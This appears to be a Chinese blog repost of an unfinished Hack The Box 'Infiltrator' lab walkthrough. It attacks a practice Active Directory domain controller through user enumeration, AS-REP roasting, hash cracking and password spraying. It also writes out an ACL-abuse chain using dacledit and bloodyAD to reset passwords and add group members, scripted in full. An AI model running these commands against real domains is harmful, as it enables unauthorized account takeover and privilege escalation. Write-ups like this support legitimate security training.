Hack The Box-Infiltrator【更新中】

2024-09-04 04:04
文章标签 更新 box hack infiltrator

本文主要是介绍Hack The Box-Infiltrator【更新中】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

信息收集&端口利用

nmap -sSVC infiltrator.htbStarting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 09:17 CST
Nmap scan report for infiltrator.htb
Host is up (0.61s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Infiltrator.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-02 01:19:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-09-02T01:20:40+00:00; -3s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-09-02T01:20:38+00:00; -2s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-02T01:20:40+00:00; -3s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-02T01:20:38+00:00; -2s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-02T01:20:39+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Not valid before: 2024-07-30T13:20:17
|_Not valid after:  2025-01-29T13:20:17
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-time: 
|   date: 2024-09-02T01:20:07
|_  start_date: N/A
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

开放了挺多端口,并且存在域为dc01.infiltrator.htb,先看80端口信息

在这里插入图片描述

在这里插入图片描述

看了一会,发现没有什么特别的信息

在这里插入图片描述

有一个邮件交流入口,但是应该和以前的机器一样,利用不了,装样子罢

在这里插入图片描述

回到端口处,靶机还开放了139,445端口,可能存在SMB漏洞,详见以下链接

https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-smb

先用enum4linux探测是否存在信息泄露

enum4linux -a infiltrator.htb

在这里插入图片描述

都没有权限

回到网页,发现网站中有一些用户名,思考这些是否能够用来SMB爆破

在这里插入图片描述

在源码中发现一共有7个用户名

在这里插入图片描述

将其全部提取出来

在这里插入图片描述

使用这些用户名爆破SMB

./kerbrute userenum -d "infiltrator.htb" username.txt --dc "dc01.infiltrator.htb"

在这里插入图片描述

但是均失败

在这里插入图片描述

回到网页,看到此处的信息,猜测是否是因为用户名格式不对

根据外国名字缩写规则和邮箱格式,重新生成一段字典

在这里插入图片描述

再次进行破解尝试

在这里插入图片描述

能够爆破出存在的用户名,再使用GetNPUsers筛选出所有不需要”Kerberos预身份验证”的用户

impacket-GetNPUsers infiltrator.htb/ -usersfile newname.txt -outputfile outputusers.txt -dc-ip dc01.infiltrator.htb -no-pass

在这里插入图片描述

能够获取到l.clark用户的hash值,此hash值对应的模式为18200,使用hashcat爆破

在这里插入图片描述

使用获取到的用户密码再跑一次enum4linux,顺便来一次密码喷洒

在这里插入图片描述

在这里插入图片描述

还是获取不到啥信息

密码喷洒

crackmapexec smb [ip] -u tname.txt -p [passwd]

在这里插入图片描述

发现d.anderson用户的密码也是这个密码

使用bloodhound收集域内信息

bloodhound-python -c ALL -u l.clark -p '[password]' -d dc01.infiltrator.htb -ns [ip]
bloodhound-python -c ALL -u d.anderson -p '[password]' -d dc01.infiltrator.htb -ns [ip]

在这里插入图片描述

使用bloodhound分析

在这里插入图片描述

通过攻击链能够得到一条攻击路径为:D.ANDERSON->MARKETING DIGITAL->E.RODRIGUEZ->CHIEFS MARKETING->M.HARRIS->DC01

接下来需要一步步的操作

D.ANDERSON->MARKETING DIGITAL

在此攻击链路中,D.ANDERSON对MARKETING DIGITAL具有GenericAll权限,在前面我们知道,该用户不能够直接登录,账户权限受到控制,因此这一步旨在提升d.anderson用户的权限。先获取该用户的TGT,然后再使用该TGT以及GenericAll权限,赋予d.anderson对marketing digital的完全控制权

#获取d.andersonTGT
impacket-getTGT infiltrator.htb/d.anderson:'[password]' -dc-ip dc01.infiltrator.htb
#使用dacledit修改ACL使得d.anderson具有完全控制权
export KRB5CCNAME=d.anderson.ccache
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip [ip]
#没有dacledit的可以从https://github.com/ThePorgs/impacket.git下载并配置

在这里插入图片描述

MARKETING DIGITAL->E.RODRIGUEZ

因为e.rodriguez用户包含在marketing digital组中,而d.anderson对其具有完全控制权,可以直接修改其密码

注意,由于密码策略,此处需要执行完上一步后快速执行,不然会报错

#使用d.anderson的权限和bloodAD修改e.rodriguez密码
python3 /root/Dekstop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "d.anderson" -p "[password]" set password "e.rodriguez" "[newpass]"

在这里插入图片描述

E.RODRIGUEZ->CHIEFS MARKETING

在上一步,我们已经修改了e.rodriguez的密码,在关系图中,可以看到接下去要将该用户添加到chiefs marketing组当中

#获取e.rodriguez的TGT
impacket-getTGT infiltrator.htb/"e.rodriguez":"[newpass]" -dc-ip dc01.infiltrator.htb
#利用addself权限添加
KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip [ip] -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez

在这里插入图片描述

CHIEFS MARKETING->M.HARRIS

将e.rodriguez添加进chiefs marketing后,可以看到chiefs marketing组能够强制修改m.harris的密码,意味着我们也可以通过e.rodriguez身份强制修改m.harris的密码

#使用e.rodriguez身份,在chiefs marketing组中修改m.harris的密码
KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.129.204.10 -u "e.rodriguez" -p "B3rry11\!" set password "m.harris" "B3rry22"

在这里插入图片描述

此处证书认证已经出现了问题,应该是密钥过期了,需要重新快速的运行一遍,那么重新整理一遍思路

#获取d.andersonTGT
impacket-getTGT infiltrator.htb/d.anderson:'[password]' -dc-ip dc01.infiltrator.htb
#使用dacledit修改ACL使得d.anderson具有完全控制权
export KRB5CCNAME=d.anderson.ccache
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip [ip]
#使用d.anderson的权限和bloodAD修改e.rodriguez密码
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "d.anderson" -p "[password]" set password "e.rodriguez" "[newpass]"
#获取e.rodriguez的TGT
impacket-getTGT infiltrator.htb/"e.rodriguez":"[newpass]" -dc-ip dc01.infiltrator.htb
#利用addself权限添加
KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip [ip] -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez
#使用e.rodriguez身份,在chiefs marketing组中修改m.harris的密码
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "e.rodriguez" -p "B3rry11\!" set password "m.harris" "B3rry22"

将其编写为一个sh文件,执行之

运行完成后,提示密码已经修改成功,尝试导出证书,使用evil-winrm登录

在这里插入图片描述

在这里插入图片描述

提示无法定位INFILTRATOR.HTB的KDC,这里需要修改本机的/etc/krb5.conf配置文件

[libdefaults]default_realm = INFILTRATOR.HTBdns_lookup_realm = falsedns_lookup_kdc = falseforwardable = true
[realms]INFILTRATOR.HTB = {kdc = dc01.infiltrator.htbadmin_server = dc01.infiltrator.htb}
[domain_realm].infiltrator.htb = INFILTRATOR.HTBinfiltrator.htb = INFILTRATOR.HTB

在这里插入图片描述

这篇关于Hack The Box-Infiltrator【更新中】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1134944

相关文章

MySQL新增字段后Java实体未更新的潜在问题与解决方案

《MySQL新增字段后Java实体未更新的潜在问题与解决方案》在Java+MySQL的开发中,我们通常使用ORM框架来映射数据库表与Java对象,但有时候,数据库表结构变更(如新增字段)后,开发人员可... 目录引言1. 问题背景:数据库与 Java 实体不同步1.1 常见场景1.2 示例代码2. 不同操作

一文详解SQL Server如何跟踪自动统计信息更新

《一文详解SQLServer如何跟踪自动统计信息更新》SQLServer数据库中,我们都清楚统计信息对于优化器来说非常重要,所以本文就来和大家简单聊一聊SQLServer如何跟踪自动统计信息更新吧... SQL Server数据库中,我们都清楚统计信息对于优化器来说非常重要。一般情况下,我们会开启"自动更新

Redis缓存问题与缓存更新机制详解

《Redis缓存问题与缓存更新机制详解》本文主要介绍了缓存问题及其解决方案,包括缓存穿透、缓存击穿、缓存雪崩等问题的成因以及相应的预防和解决方法,同时,还详细探讨了缓存更新机制,包括不同情况下的缓存更... 目录一、缓存问题1.1 缓存穿透1.1.1 问题来源1.1.2 解决方案1.2 缓存击穿1.2.1

Linux Mint Xia 22.1重磅发布: 重要更新一览

《LinuxMintXia22.1重磅发布:重要更新一览》Beta版LinuxMint“Xia”22.1发布,新版本基于Ubuntu24.04,内核版本为Linux6.8,这... linux Mint 22.1「Xia」正式发布啦!这次更新带来了诸多优化和改进,进一步巩固了 Mint 在 Linux 桌面

SpringCloud配置动态更新原理解析

《SpringCloud配置动态更新原理解析》在微服务架构的浩瀚星海中,服务配置的动态更新如同魔法一般,能够让应用在不重启的情况下,实时响应配置的变更,SpringCloud作为微服务架构中的佼佼者,... 目录一、SpringBoot、Cloud配置的读取二、SpringCloud配置动态刷新三、更新@R

Ubuntu 24.04 LTS怎么关闭 Ubuntu Pro 更新提示弹窗?

《Ubuntu24.04LTS怎么关闭UbuntuPro更新提示弹窗?》Ubuntu每次开机都会弹窗提示安全更新,设置里最多只能取消自动下载,自动更新,但无法做到直接让自动更新的弹窗不出现,... 如果你正在使用 Ubuntu 24.04 LTS,可能会注意到——在使用「软件更新器」或运行 APT 命令时,

poj3468(线段树成段更新模板题)

题意:包括两个操作:1、将[a.b]上的数字加上v;2、查询区间[a,b]上的和 下面的介绍是下解题思路: 首先介绍  lazy-tag思想:用一个变量记录每一个线段树节点的变化值,当这部分线段的一致性被破坏我们就将这个变化值传递给子区间,大大增加了线段树的效率。 比如现在需要对[a,b]区间值进行加c操作,那么就从根节点[1,n]开始调用update函数进行操作,如果刚好执行到一个子节点,

hdu1394(线段树点更新的应用)

题意:求一个序列经过一定的操作得到的序列的最小逆序数 这题会用到逆序数的一个性质,在0到n-1这些数字组成的乱序排列,将第一个数字A移到最后一位,得到的逆序数为res-a+(n-a-1) 知道上面的知识点后,可以用暴力来解 代码如下: #include<iostream>#include<algorithm>#include<cstring>#include<stack>#in

hdu1689(线段树成段更新)

两种操作:1、set区间[a,b]上数字为v;2、查询[ 1 , n ]上的sum 代码如下: #include<iostream>#include<algorithm>#include<cstring>#include<stack>#include<queue>#include<set>#include<map>#include<stdio.h>#include<stdl

hdu 1754 I Hate It(线段树,单点更新,区间最值)

题意是求一个线段中的最大数。 线段树的模板题,试用了一下交大的模板。效率有点略低。 代码: #include <stdio.h>#include <string.h>#define TREE_SIZE (1 << (20))//const int TREE_SIZE = 200000 + 10;int max(int a, int b){return a > b ? a :